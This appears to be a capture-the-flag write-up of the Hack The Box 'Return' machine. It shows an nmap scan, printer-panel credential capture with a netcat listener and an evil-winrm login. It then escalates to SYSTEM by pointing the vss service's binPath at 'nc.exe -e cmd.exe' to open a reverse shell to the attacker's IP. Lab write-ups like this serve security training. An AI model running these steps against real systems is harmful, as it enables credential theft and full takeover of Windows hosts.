neoh main ~/HTB/return sudo nmap -sSCV -p- -T4 10.10.11.108 -oN nmap.md
Starting Nmap 7.80 ( https://nmap.org ) at 2021-11-14 11:35 EST
Nmap scan report for 10.10.11.108
Host is up (0.025s latency).
Not shown: 65510 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: HTB Printer Admin Panel
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-11-14 17:08:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49682/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=11/14%Time=61913AFD%P=x86_64-pc-linux-gnu%r(DNS
SF:VersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version
SF:\x04bind\0\0\x10\0\x03");
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 32m28s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-11-14T17:10:58
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 299.94 seconds
Nmap reveals a lot of ports on this machine. My attention is brought to the SMB server. There is not possible NTLM relay since signing is required but I’ll give it a look if there is anything interesting.
neoh main ~/HTB/return smbclient -L \\\\10.10.11.108\\
Enter WORKGROUP\neoh's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
Unfortunately no guest login available. Let’s check the website running on port 80.


First I’ll start my “server” using netcat.
neoh main ~/HTB/return sudo nc -nlvp 389
[sudo] password for neoh:
Listening on 0.0.0.0 389

So we get a hit on our listener!
neoh main ~/HTB/return sudo nc -nlvp 389
[sudo] password for neoh:
Listening on 0.0.0.0 389
Connection received on 10.10.11.108 64874
0*`%return\svc-printer�
1edFg43012!!
Ok now, we got a username and a password. If we remember, nmap revealed Win-RM port is open. Since we have credentials we can use evil-winrm to login into the machine.
neoh main ~/HTB/return evil-winrm -i 10.10.11.108 -u svc-printer
Enter Password:
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami
return\svc-printer
*Evil-WinRM* PS C:\Users\svc-printer\Documents>
*Evil-WinRM* PS C:\Users\svc-printer\Documents> net user svc-printer
User name svc-printer
Full Name SVCPrinter
Comment Service Account for Printer
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/26/2021 12:15:13 AM
Password expires Never
Password changeable 5/27/2021 12:15:13 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/26/2021 12:39:29 AM
Logon hours allowed All
Local Group Memberships *Print Operators *Remote Management Use
*Server Operators
Global Group memberships *Domain Users
The command completed successfully.
Local group enumeration revealed svc-printer is part of the Server Operators group which allow us to manage services on the system. We are allowed to start, stop and edit services and wth that in mind, I can upload netcat.exe and run it as a service to get an Admin reverse shell. Let’s try that.
*Evil-WinRM* PS C:\Users\svc-printer\Documents> upload /home/neoh/HTB/return/nc.exe
Info: Uploading /home/neoh/HTB/return/nc.exe to C:\Users\svc-printer\Documents\nc.exe
Data: 51488 bytes of 51488 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-printer\Documents>
Then i start a new listener on my machine and change the config of vss service.
neoh main ~/HTB/return nc -nvlp 4444
Listening on 0.0.0.0 4444
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe config vss binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.14.13 4444"
[SC] ChangeServiceConfig SUCCESS
*Evil-WinRM* PS C:\Users\svc-printer\Documents>
Next step is to stop and start the service which should give us a shell.
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe stop vss
[SC] ControlService FAILED 1062:
The service has not been started.
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe start vss
neoh main ~/HTB/return nc -nvlp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.11.108 65500
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
Rooted!